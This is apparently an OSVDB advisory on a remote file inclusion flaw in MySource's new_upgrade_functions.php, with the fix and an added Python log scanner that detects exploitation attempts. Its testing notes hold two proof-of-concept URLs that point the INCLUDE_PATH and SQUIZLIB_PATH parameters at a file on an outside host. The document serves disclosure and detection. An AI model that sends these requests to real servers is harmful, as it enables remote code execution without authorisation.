MySource new_upgrade_functions.php Multiple Variable Remote File Inclusion

2005-10-18T11:20:27
ID OSVDB:20035
Type osvdb
Reporter Secunia Security Advisories(sec-adv@secunia.com)
Modified 2005-10-18T11:20:27

Description

Vulnerability Description

MySource contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'new_upgrade_functions.php' not properly sanitizing user input supplied to the 'INCLUDE_PATH' and 'SQUIZLIB_PATH' variables. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 2.14.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[target]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
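
Added example (not part of the original advisory or of MySource): a Python check that scans web-server access logs for requests of the shape shown in the testing notes above, i.e. INCLUDE_PATH or SQUIZLIB_PATH set to a URL on this script. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter names come from the advisory text.
SCRIPT = "new_upgrade_functions.php"
PARAMS = {"INCLUDE_PATH", "SQUIZLIB_PATH"}
# A value that starts with a URL scheme (http:, ftp:, ...) points include() off-host.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)
# Request field of a common/combined format access-log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def remote_include_params(line):
    """Return the advisory parameters in one log line that carry a URL value."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not unquote(url.path).endswith("/" + SCRIPT):
        return []
    # parse_qsl percent-decodes names and values once, as PHP does.
    pairs = parse_qsl(url.query, keep_blank_values=True)
    return sorted({n for n, v in pairs if n in PARAMS and REMOTE.match(v)})

def scan(lines):
    """Return (line_number, client, params) for every matching request."""
    hits = []
    for no, line in enumerate(lines, 1):
        params = remote_include_params(line)
        if params:
            hits.append((no, line.split(" ", 1)[0], params))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
BASE = "/web/edit/upgrade_functions/new_upgrade_functions.php"
SAMPLE = [
    f'192.0.2.10 - - [18/Oct/2005:11:20:27 +0000] "GET {BASE}?INCLUDE_PATH=http://203.0.113.5/x.txt? HTTP/1.1" 200 512',
    f'192.0.2.11 - - [18/Oct/2005:11:21:02 +0000] "GET {BASE}?SQUIZLIB_PATH=ftp%3A%2F%2F203.0.113.5%2Fx HTTP/1.1" 200 512',
    f'192.0.2.12 - - [18/Oct/2005:11:22:40 +0000] "GET {BASE}?INCLUDE_PATH=/var/www/include HTTP/1.1" 200 512',
    '192.0.2.13 - - [18/Oct/2005:11:23:15 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for no, client, params in scan(SAMPLE):
        print(f"line {no}: {client} set {', '.join(params)} to a URL")
```

With register_globals on, PHP also fills these variables from POST bodies and cookies, which a standard access log does not record, so a clean scan does not rule out attempts.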

References:

Vendor URL: http://mysource.squiz.net/
Security Tracker: 1015075
Secunia Advisory ID: 16946
Related OSVDB ID: 20041
Related OSVDB ID: 20043
Related OSVDB ID: 20042
Related OSVDB ID: 20036
Related OSVDB ID: 20037
Related OSVDB ID: 20038
Related OSVDB ID: 20039
Related OSVDB ID: 20040
Other Advisory URL: http://secunia.com/secunia_research/2005-51/advisory/
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0405.html
CVE-2005-3519
Bugtraq ID: 15133